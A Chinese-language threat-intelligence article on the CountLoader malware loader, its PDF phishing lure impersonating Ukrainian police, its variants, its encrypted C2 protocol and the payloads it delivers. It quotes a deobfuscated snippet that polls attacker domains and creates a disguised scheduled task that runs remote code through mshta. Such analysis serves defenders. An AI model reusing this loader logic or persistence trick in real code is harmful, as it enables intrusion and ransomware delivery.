近几个月来,安全团队发现了一种复杂的恶意软件加载器,名为CountLoader,它利用武器化的PDF文件来交付勒索软件有效载荷。
CountLoader于2025年8月底首次被发现,与多个俄语网络犯罪集团有关联,包括LockBit、BlackBasta和Qilin的附属机构。
这种加载程序通过伪装成合法文件(通常冒充乌克兰执法部门),利用社会工程学和PDF漏洞链,在目标环境中获取初步立足点。
CountLoader的部署方法围绕着三个不同的版本展开,这些版本分别用JScript(.hta)、.NET和PowerShell编写。
每个变体都具有独特的属性:JScript版本提供最全面的功能,拥有多种下载和执行方法;.NET二进制文件在预设日期后会启用硬编码的终止开关;PowerShell脚本则作为精简的加载器存在,具有反射式内存中执行能力。
Silent Push的分析师指出,所有变体都采用了一种自定义的C2通信协议,该协议利用XOR和Base64加密程序来隐藏其控制流量。
CountLoader的影响远不止于单纯的初始访问。成功执行后,该加载器会采集设备的特定细节(如硬件标识符、域成员身份和防病毒产品的存在情况),以生成唯一的受害者ID。
然后,它会进入持续的C2轮询循环,下载二级有效载荷,如Cobalt Strike信标、Adaptix植入程序和pureHVNC后门。
在东欧拥有加入域的系统的组织一直是主要目标,这表明企业和政府实体是被战略性选择的对象。
CountLoader 主要是通过一个伪装成乌克兰国家警察局的基于PDF的钓鱼诱饵进行传播的。这个恶意PDF包含一个嵌入的HTML应用程序对象,该对象会触发mshta.exe来获取并执行JScript加载器。
打开文档后,受害者会看到一个看似官方的通知,指示他们通过嵌入的链接“发起请求”,而该链接会启动加载程序的下载过程。
感染机制
CountLoader的感染机制始于武器化PDF,它利用的是用户交互而非零日漏洞。
该PDF嵌入了一个HTA对象,点击时会调用Windows的mshta引擎。
这个HTA脚本使用免费的JavaScript混淆器进行了混淆处理,包含大约850行代码。
经过反混淆处理后,负责C2通信的主循环变得清晰可见:
for (let i = 1; i <= 10; i++) {
let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
if (response === "success") {
connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
break;
}
}
// Scheduled task creation for persistence
CreateScheduledTask({
name: "GoogleUpdaterTaskSystem",
command: `mshta https://${envVar}.example.com/start`,
delay: "PT10M"
});成功建立连接后,CountLoader会利用HTTP POST请求以及从命令与控制服务器获取的自定义Bearer令牌来获取任务。
这些任务包括通过WinHTTP、MSXML2、Curl、Bitsadmin或Certutil下载可执行文件,展示了加载器的适应性和深厚的系统知识。
任务执行后,CountLoader会向服务器报告完成情况,确保实现可靠的任务管理。
这种感染流程凸显了CountLoader的设计特点,它是一种高度模块化且具有持久性的加载器,能够分发各种勒索软件和后期利用工具,同时通过混淆和加密通信来躲避检测。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
